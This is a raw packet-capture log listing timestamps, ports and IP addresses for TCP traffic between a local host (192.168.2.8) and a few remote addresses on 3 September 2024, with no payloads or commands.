Sep 3, 2024 17:13:19.869071960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869081974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869091034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869091034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869126081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869630098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869641066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869652033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869709969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869788885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869801044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869812012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869823933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.869852066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.869869947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870371103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870383024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870392084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870459080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870459080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870536089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870547056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870560884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870572090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870584011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870609045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870635986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870929003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870939970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870953083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870965004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870975018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870985985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.870990038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.870999098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871011019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871020079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871052980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871059895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871072054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871081114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871105909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871133089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871193886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871205091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871213913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871223927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871278048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871301889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871335983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871346951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871356964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871397972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871413946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871423960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871433973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871436119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871474981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871656895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871673107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871682882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871692896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871709108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871751070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871911049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871922016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871932030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871948004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871958971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871970892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871979952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871980906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.871992111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.871995926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872016907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872030020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872208118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872219086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872235060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872251034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872253895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872262955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872275114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872278929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872288942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872306108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872308969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872308969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872318029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872337103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872349977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872364044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872628927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872639894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872654915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872664928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872674942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872684956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872693062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872697115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.872731924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.872757912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.959336996 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.959994078 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.965217113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965230942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965245008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965306044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965318918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965331078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965343952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965357065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965372086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965380907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965394974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965394974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965413094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965430975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965468884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965507984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965523005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965536118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965545893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965559006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965568066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965573072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965585947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965622902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965653896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965717077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.965936899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.965987921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966000080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966002941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966058969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966080904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966094017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966105938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966149092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966223001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966242075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966253042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966264963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966274023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966284990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966337919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966366053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966377974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966387987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966418028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966419935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966432095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966443062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966459990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966463089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966463089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966474056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966510057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966510057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966677904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966763020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966835976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966849089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966859102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966876984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966878891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966888905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966893911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966902018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966913939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966924906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966934919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966934919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966948986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.966965914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.966989040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967087030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967098951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967111111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967166901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967236996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967248917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967258930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967269897 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.967279911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967292070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967302084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967314005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967314005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967319965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967336893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967336893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967338085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967353106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967365026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967376947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967381001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967381001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967390060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967402935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967413902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967442989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967488050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967741013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967751026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967756987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967767000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967777967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967789888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967801094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967811108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967828989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967835903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967844963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967856884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967868090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967880011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967880964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967891932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967904091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967909098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967909098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967916965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967927933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967931032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967941046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.967961073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967961073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.967986107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968492031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968509912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968522072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968532085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968539000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968539000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968544960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968558073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968564987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968569994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968580961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968585014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968596935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968607903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968619108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968622923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968622923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968637943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968641996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968652964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968662977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968668938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968676090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968688011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968698978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968700886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968715906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968717098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968729973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968739986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968741894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968755960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.968769073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968791008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.968816042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969089985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969105959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969118118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969160080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969160080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969177961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969191074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969201088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969216108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969228029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969234943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969239950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969259977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969274044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969317913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969321966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969336033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969347000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969400883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.969404936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969418049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.969464064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.971745014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971796036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.971810102 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971823931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971837997 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971857071 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971862078 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.971884012 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.971904039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.971908092 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.971954107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972038984 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972050905 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972060919 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972070932 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972083092 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972085953 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972094059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972105026 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972107887 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972115040 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972119093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972132921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972141027 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972146034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972155094 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972183943 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972310066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972321033 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972330093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972341061 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972351074 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972362995 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972364902 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972373009 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972374916 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972390890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972420931 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972601891 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972614050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972623110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972645044 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972675085 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972676992 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.972687960 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972698927 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.972709894 CEST	80	49726	185.215.113.17	192.168.2.8
